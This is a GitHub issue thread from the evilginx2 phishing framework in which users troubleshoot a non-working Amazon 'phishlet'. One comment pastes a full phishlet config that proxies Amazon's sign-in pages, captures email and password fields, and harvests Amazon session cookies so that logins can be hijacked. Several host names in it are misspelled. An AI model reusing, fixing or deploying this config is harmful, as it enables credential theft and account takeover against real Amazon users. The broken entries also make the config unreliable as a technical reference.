### ISSUE TITLE
Amazon phishlet is not working

### ISSUE THREAD

**Issue by osterhagenchemnitz** [kgretzky/evilginx2#98]
The amazon phishlet is not working. Have you saw?

**Comment by kgretzky** [comment]
No, I haven't. Thanks. Is there anything else?

**Comment by osterhagenchemnitz** [comment]
No kgretzky.

**Comment by osterhagenchemnitz** [comment]
This is the error that i'm getting:

Please Enable Cookies to Continue

To continue shopping at Amazon.com, please enable cookies in your Web browser.

Once you have enabled cookies in your browser, please click on the button below to return to the previous page.

Any idea?

**Comment by ztxq** [comment]
Hi,
Succeeded to resolve the problem with enable cookies on amazon phishlet but it is not storing any cookies and is not making the redirect.  any thoughts?

`author: '@customsync'
min_ver: '2.2.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'amazon.com', session: true, is_landing: true}
  - {phish_sub: 'fls-na', orig_sub: 'fls-na', domain: 'amazon.com', session: false, is_landing: false}
  - {phish_sub: 'images-na', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', session: false, is_landing: false}
sub_filters:
  - {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'action="https://{hostname}/ap/signin', replace: 'action="https://{hostname}/ap/signin', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'action="https:&#x2F;&#x2F;{hostname}&#x2F;ap&#x2F;signin', replace: 'action="https://{hostname}/ap/signin', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-iges-amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
auth_tokens:
  - domain: '.amazon.com'
    keys: ["session-id", "session-id-time", "session-token", "skin", "ubid-main", "x-wl-uid"]
  - domain: 'www.amazon.com'
    keys: ["csm-hit"]
credentials:
  username:
    key: 'email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
landing_path:
  - '/ap/signin?_encoding=UTF8&ignoreAuthState=1&openid.assoc_handle=usflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.com%2F%3Fref_%3Dnav_custrec_signin&switch_account='`

**Comment by ztxq** [comment]
Hi,
Succeeded to resolve the problem with enable cookies on amazon phishlet but it is not storing any cookies and is not making the redirect. any thoughts?
